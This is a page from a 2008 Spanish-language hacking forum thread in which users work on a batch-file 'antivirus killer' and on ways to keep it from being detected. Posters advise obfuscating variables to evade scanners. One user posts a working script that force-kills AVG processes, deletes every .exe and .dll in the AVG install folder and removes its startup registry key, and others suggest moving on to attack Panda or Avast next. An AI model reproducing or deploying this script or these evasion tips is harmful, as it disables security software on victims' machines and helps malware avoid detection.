elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: ¿Eres nuevo? ¿Tienes dudas acerca del funcionamiento de la comunidad? Lee las Reglas Generales


+  Foro de elhacker.net
|-+  Programación
| |-+  Scripting
| | |-+  Que no detecten mi av-killer hecho en batch...
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: 1 [2] 3 Ir Abajo Respuesta Imprimir
Autor Tema: Que no detecten mi av-killer hecho en batch...  (Leído 14,058 veces)
Sai-To

Desconectado Desconectado

Mensajes: 180


Ver Perfil
Re: Que no detecten mi av-killer hecho en batch...
« Respuesta #10 en: 11 Mayo 2008, 22:15 pm »

trata de cifrar! ;) set va = blablabla...


En línea

Carloswaldo
Traductor
Moderador Global
***
Desconectado Desconectado

Mensajes: 4.764


Nos reservamos el derecho de ban.


Ver Perfil WWW
Re: Que no detecten mi av-killer hecho en batch...
« Respuesta #11 en: 11 Mayo 2008, 22:46 pm »

trata de cifrar! ;) set va = blablabla...

Wiiiiiiiiiiiiiiiiiiiiiiiiii ;D ;D ;D ;D ;D ;D ;D ;D ;D

Avg matado, a por el proximo av ::)


En línea





Dominio en venta: https://forojapones.com/
Carloswaldo
Traductor
Moderador Global
***
Desconectado Desconectado

Mensajes: 4.764


Nos reservamos el derecho de ban.


Ver Perfil WWW
Re: Que no detecten mi av-killer hecho en batch...
« Respuesta #12 en: 12 Mayo 2008, 03:00 am »

Por cierto, algo raro me pasa, aún matando el avg me da acceso denegado cuando quiero editar el .bat que tenía el código pobre. Esto no pasaba antes de instalar el avg, ¿será que un servicio sigue activo? ¿cómo averiguarlo?
En línea





Dominio en venta: https://forojapones.com/
MK-Ultra


Desconectado Desconectado

Mensajes: 435


~ Nevermind ~


Ver Perfil WWW
Re: Que no detecten mi av-killer hecho en batch...
« Respuesta #13 en: 12 Mayo 2008, 03:39 am »

Por cierto, algo raro me pasa, aún matando el avg me da acceso denegado cuando quiero editar el .bat que tenía el código pobre. Esto no pasaba antes de instalar el avg, ¿será que un servicio sigue activo? ¿cómo averiguarlo?

Mirando en el administrador de Tareas  :rolleyes:

Cita de: Carloswaldo
OBVIO, pero como se yo cuales son.

Cita de: Freeze.
Mirando los ejecutables que tienes en la ruta de la carpeta del AVG, OBVIO

 :rolleyes:
En línea

Agradecer no cuesta nada (al menos no mucho)

BTC: 1DHKsWE6wGkUiHbKkwBDaF8DEGwn9n6nxQ
Carloswaldo
Traductor
Moderador Global
***
Desconectado Desconectado

Mensajes: 4.764


Nos reservamos el derecho de ban.


Ver Perfil WWW
Re: Que no detecten mi av-killer hecho en batch...
« Respuesta #14 en: 12 Mayo 2008, 04:08 am »

Si ya no hay ningún ejecutable porque se borraron todos. :xD
En línea





Dominio en venta: https://forojapones.com/
Carloswaldo
Traductor
Moderador Global
***
Desconectado Desconectado

Mensajes: 4.764


Nos reservamos el derecho de ban.


Ver Perfil WWW
Re: Que no detecten mi av-killer hecho en batch...
« Respuesta #15 en: 12 Mayo 2008, 06:29 am »

Me he tomado el trabajo de buscar todos y cada uno de los procesos que tenía activos. Unos eran del sistema, otros del vmware, etc, pero nada de nada con respecto al avg... le perdí el rastro :(
En línea





Dominio en venta: https://forojapones.com/
Freeze.


Desconectado Desconectado

Mensajes: 2.732



Ver Perfil WWW
Re: Que no detecten mi av-killer hecho en batch...
« Respuesta #16 en: 12 Mayo 2008, 19:34 pm »

Estuve un buen tiempo - ahora que recuerdo - tratando de matar al AVG desde  VB y no pude porque no podia desactivar servicios o algo asi :P

Así que podrias comenzar con otro AV más facil o menos dificil ;) Como el panda o el avast ;)
En línea

MK-Ultra


Desconectado Desconectado

Mensajes: 435


~ Nevermind ~


Ver Perfil WWW
Re: Que no detecten mi av-killer hecho en batch...
« Respuesta #17 en: 12 Mayo 2008, 21:23 pm »

el avast no es malo ^^

te recomiendo el panda antes que el avast  ;)
En línea

Agradecer no cuesta nada (al menos no mucho)

BTC: 1DHKsWE6wGkUiHbKkwBDaF8DEGwn9n6nxQ
Carloswaldo
Traductor
Moderador Global
***
Desconectado Desconectado

Mensajes: 4.764


Nos reservamos el derecho de ban.


Ver Perfil WWW
Re: Que no detecten mi av-killer hecho en batch...
« Respuesta #18 en: 12 Mayo 2008, 21:57 pm »

Pero... pero.... debe haber una forma... Y alguien debe de saberla ¿verdad?...

No me rendiré ahora que he llegado "tan" lejos... :xD :xD

Carloswaldo :(
En línea





Dominio en venta: https://forojapones.com/
Carloswaldo
Traductor
Moderador Global
***
Desconectado Desconectado

Mensajes: 4.764


Nos reservamos el derecho de ban.


Ver Perfil WWW
Re: Que no detecten mi av-killer hecho en batch...
« Respuesta #19 en: 12 Mayo 2008, 23:51 pm »

He estado investigando.

Este archivo no lo puedo eliminar ni a bala, osea ni forzandolo en el cmd ni nada:

avgse.dll

Esto es lo que encontre en internet:

Citar
Description: avgse.dll is located in a subfolder of "C:\Program Files" - normally C:\Program Files\Grisoft\AVG Free\. Known file sizes on Windows XP are 40960 bytes (47% of all occurrence), 50688 bytes, 29743 bytes, 45056 bytes, 28207 bytes.
A .dll file (Dynamic Link Library) is a special type of Windows program containing functions that other programs can call. This .dll file can be injected to all running processes and can change or manipulate their behavior. The program is not visible. The service has no detailed description. It can change the behavior of other programs or manipulate other programs. File avgse.dll is not a Windows system file. avgse.dll seems to be a compressed file. Therefore the technical security rating is 64% dangerous, however also read the users reviews.

Quiere decir que esta dll puede estar camuflada en otro proceso? como saberlo?

Ahí está mi codigo:

Código:
@echo off
set a=avgamsvr.exe
set b=avgcc.exe
set c=avgemc.exe
set d=avgupsvc.exe
set e=\Grisoft\AVG7
set f=*.exe*
set g=*.dll*
taskkill /f /im %a%
taskkill /f /im %b%
taskkill /f /im %c%
taskkill /f /im %d%
cd %programfiles%%e%
del /f /q /s %f%
del /f /q /s %g%
REG DELETE HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ /v AVG7_CC /f
exit
En línea





Dominio en venta: https://forojapones.com/
Páginas: 1 [2] 3 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
¿Cómo evitar que me detecten en... « 1 2 »
Redes
bertitop 10 33,390 Último mensaje 17 Febrero 2012, 21:04 pm
por bertitop
Reproductor mp3 hecho en batch
Software
**Aincrad** 0 1,369 Último mensaje 13 Junio 2017, 05:45 am
por **Aincrad**
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines